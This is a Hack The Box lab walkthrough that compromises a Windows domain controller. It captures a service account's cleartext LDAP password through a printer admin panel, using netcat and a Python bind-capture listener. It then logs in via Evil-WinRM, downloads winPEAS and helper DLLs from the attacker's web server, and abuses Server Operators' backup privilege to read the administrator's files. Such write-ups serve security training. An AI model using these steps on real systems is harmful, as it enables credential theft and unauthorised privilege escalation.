Enumeration
I ran nmap and found a number of open ports.
❯ ports=$(nmap -p- -T4 -Pn -n 10.129.111.124 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
❯ echo $ports
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49679,49697
❯ nmap -sC -sV -Pn -n -p$ports 10.129.111.124
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 22:55 BST
Nmap scan report for 10.129.111.124
Host is up (0.056s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-08 21:14:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-05-08T21:15:18
|_  start_date: N/A
|_clock-skew: -41m25s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
The port list (DNS, Kerberos, LDAP, SMB, WinRM) says this is a domain controller for return.local. I first checked the web server on port 80: it is a printer admin panel. In the "settings" tab there is some information about the printer: the server address, port and username:

I also ran nikto and brute-forced directories with gobuster, but nothing interesting showed up.
I also checked SMB; the host identifies itself as PRINTER in the domain return.local, with SMB signing required:
❯ crackmapexec smb 10.129.111.124
SMB         10.129.111.124  445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
User flag
The settings page on the web seemed interesting, so I explored it a little. At first glance the "Update" button doesn't appear to do anything, so I started Burp Suite to see whether the button actually sends something. It turns out the button sends a POST request containing only the IP, so the other fields are just decoration:

I put my own IP address in the "server address" field and started tcpdump to see whether any packets arrived. As I expected, the server tried to connect back to me on port 389 (LDAP). Nothing was listening yet, so my host answered each SYN with a RST and the server retried:
❯ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:01:25.580400 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [SEW], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:25.580436 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1735226943, win 0, length 0
00:01:26.148466 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [S], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:26.148504 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1, win 0, length 0
00:01:26.714128 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [S], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:26.714169 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1, win 0, length 0
^C
6 packets captured
6 packets received by filter
0 packets dropped by kernel
I started a netcat listener on port 389 and opened Wireshark to get a more detailed view of the packets.
❯ sudo nc -lvvnp 389
[sudo] password for user:
listening on [any] 389 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.111.124] 60243
0*`%return\svc-printer� 1edFg43012!!
Netcat captured a bind attempt: "return\svc-printer" is a domain user and "1edFg43012!!" looks like its password. What the panel actually sent is an LDAP simple bind, so the credentials stored in the printer go over the network in cleartext to whatever host is configured as the server address. I opened the packet in Wireshark to see it more clearly:

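The bytes netcat printed are a BER-encoded LDAPv3 BindRequest, and with a simple bind on plain port 389 the DN and password are on the wire in cleartext, which is why they are legible in the terminal. The following is an added example of my own, not code from the original writeup: it decodes such a request properly instead of reading it off the screen. The sample bytes are reconstructed from the capture above (the messageID byte was not legible, so 1 is assumed), and capture_bind() is a one-shot listener for a live run against the printer panel.

```python
"""Decode the LDAP simple bind a misconfigured device sends to an attacker-controlled server."""
import socket


def read_tlv(buf: bytes, pos: int = 0):
    """Decode one BER tag-length-value at buf[pos] (X.690 8.1); return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER element")
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                        # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER element")
    return tag, value, pos + length


def parse_bind_request(msg: bytes) -> dict:
    """Parse an LDAPMessage carrying a BindRequest (RFC 4511, section 4.2).

    LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp BindRequest }
    BindRequest ::= [APPLICATION 0] SEQUENCE {
        version INTEGER, name LDAPDN,
        authentication CHOICE { simple [0] OCTET STRING, sasl [3] SaslCredentials } }
    """
    tag, ldap_msg, _ = read_tlv(msg)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, msg_id, pos = read_tlv(ldap_msg)
    if tag != 0x02:
        raise ValueError("messageID is not an INTEGER")
    tag, op, _ = read_tlv(ldap_msg, pos)
    if tag != 0x60:                          # [APPLICATION 0], constructed = BindRequest
        raise ValueError(f"protocolOp tag 0x{tag:02x} is not a BindRequest")
    _, version, pos = read_tlv(op)
    _, name, pos = read_tlv(op, pos)
    auth_tag, auth, _ = read_tlv(op, pos)
    info = {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode("utf-8", errors="replace"),
    }
    if auth_tag == 0x80:                     # [0] simple: the password itself, cleartext on the wire
        info["auth"] = "simple"
        info["password"] = auth.decode("utf-8", errors="replace")
    elif auth_tag == 0xA3:                   # [3] sasl: mechanism name plus opaque credentials
        _, mechanism, _ = read_tlv(auth)
        info["auth"] = "sasl"
        info["mechanism"] = mechanism.decode("utf-8", errors="replace")
        info["password"] = None              # e.g. GSS-SPNEGO carries a Kerberos/NTLM blob, not a password
    else:
        raise ValueError(f"unknown authentication choice 0x{auth_tag:02x}")
    return info


# Constructed sample: the BindRequest rebuilt from the bytes netcat printed
# ("0*`%" ... "return\svc-printer" ... "1edFg43012!!").  The messageID value was
# not legible in the capture, so 1 is assumed.
CAPTURED_BIND = (
    b"\x30\x2a"                              # LDAPMessage SEQUENCE, 42 bytes follow
    b"\x02\x01\x01"                          #   messageID INTEGER 1 (assumed)
    b"\x60\x25"                              #   BindRequest, 37 bytes follow
    b"\x02\x01\x03"                          #     version 3
    b"\x04\x12" b"return\\svc-printer"       #     name, 18 bytes
    b"\x80\x0c" b"1edFg43012!!"              #     simple authentication, 12 bytes
)


def capture_bind(bind_addr: str = "0.0.0.0", port: int = 389, timeout: float = 120.0):
    """Accept one TCP connection on the LDAP port and parse its first message.

    Point the device's "server address" at this host first; binding port 389
    needs root on Linux.  Returns (peer_address, parsed_bind).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)
    return peer, parse_bind_request(data)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; use capture_bind() for a live run.
    for key, value in parse_bind_request(CAPTURED_BIND).items():
        print(f"{key:>10}: {value}")
```

The SASL branch is there because a hardened device would bind with GSS-SPNEGO (Kerberos or NTLM) or over LDAPS, in which case the listener gets a ticket or an NTLM challenge blob rather than a reusable password; seeing tag 0x80 on port 389 is the tell that the credentials are recoverable as-is.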
So indeed, "1edFg43012!!" is the password. Port 5985 (WinRM) is open, so I try to connect to the machine with Evil-WinRM:
❯ evil-winrm -i 10.129.111.124 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents>
It worked, so first I took the user flag.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> dir ..\Desktop

    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -ar---         5/8/2022   2:12 PM             34 user.txt
Root flag
First I listed the SMB shares as "svc-printer". There was nothing to use directly, although READ on ADMIN$ and READ,WRITE on C$ is far more than an ordinary domain user gets and is already a hint that the account sits in a privileged group:
❯ crackmapexec smb 10.129.111.124 --shares -u svc-printer -p '1edFg43012!!'
SMB         10.129.111.124  445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.129.111.124  445    PRINTER          [+] return.local\svc-printer:1edFg43012!!
SMB         10.129.111.124  445    PRINTER          [+] Enumerated shares
SMB         10.129.111.124  445    PRINTER          Share           Permissions     Remark
SMB         10.129.111.124  445    PRINTER          -----           -----------     ------
SMB         10.129.111.124  445    PRINTER          ADMIN$          READ            Remote Admin
SMB         10.129.111.124  445    PRINTER          C$              READ,WRITE      Default share
SMB         10.129.111.124  445    PRINTER          IPC$            READ            Remote IPC
SMB         10.129.111.124  445    PRINTER          NETLOGON        READ            Logon server share
SMB         10.129.111.124  445    PRINTER          SYSVOL          READ            Logon server share
Time for local enumeration: I uploaded winPEAS and ran it.
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/winPEASx64.exe -OutFile winpeas.exe
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> .\winpeas.exe
It found something interesting: we are a member of the BUILTIN\Server Operators group (and of Print Operators), which we can confirm with whoami /groups:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>
Searching Google for a way to escalate privileges as a member of the "Server Operators" group, I found a page by Cube0x0 that explains two ways for members of this group to escalate. The first one Cube0x0 describes allows reading sensitive files; since we only want the root flag, that should be enough for us.
I will first download the two required DLLs from the suggested repository and start an HTTP server to serve them to the target machine:
❯ git clone https://github.com/giuliano108/SeBackupPrivilege.git
[...]
❯ cd SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug
❯ ls -la
Permissions Size User Date Modified Name
.rw-r--r--   12k user  9 May  1:02  SeBackupPrivilegeCmdLets.dll
.rw-r--r--   16k user  9 May  1:02  SeBackupPrivilegeUtils.dll
❯ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Then I fetched them on the target:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/SeBackupPrivilegeCmdLets.dll -OutFile SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/SeBackupPrivilegeUtils.dll -OutFile SeBackupPrivilegeUtils.dll
I followed the steps in the Cube0x0 guide and imported both DLLs:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
Now I should be able to traverse (cd into) any directory, local or remote, and list its contents (dir, Get-ChildItem), so I try to move to the Administrator home:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -ar---         5/8/2022   2:12 PM             34 root.txt
There is the root flag, but we can't just type root.txt because we don't have permission on the file itself. Fortunately, Cube0x0 also explains how to read files using the same privilege. Strictly speaking this is not a vulnerability: Server Operators are granted SeBackupPrivilege by default on domain controllers (you can confirm it with whoami /priv), and that privilege lets a file opened with backup semantics bypass its ACL. I need to act like backup software and copy the file somewhere I can read it. The Copy-FileSeBackupPrivilege cmdlet from the module we just imported does exactly that (it opens the source with FILE_FLAG_BACKUP_SEMANTICS), after which I can read the copy:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt C:\windows\temp\root.txt -Overwrite
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type C:\windows\temp\root.txt
{flag}
And that’s my flag!
NOTE: The Cube0x0 guide describes a second way to achieve LPE as a Server Operator, which gives you a shell as SYSTEM. If you are curious I encourage you to try it, because a SYSTEM shell is of course far more useful than just listing and reading any directory or file on the system.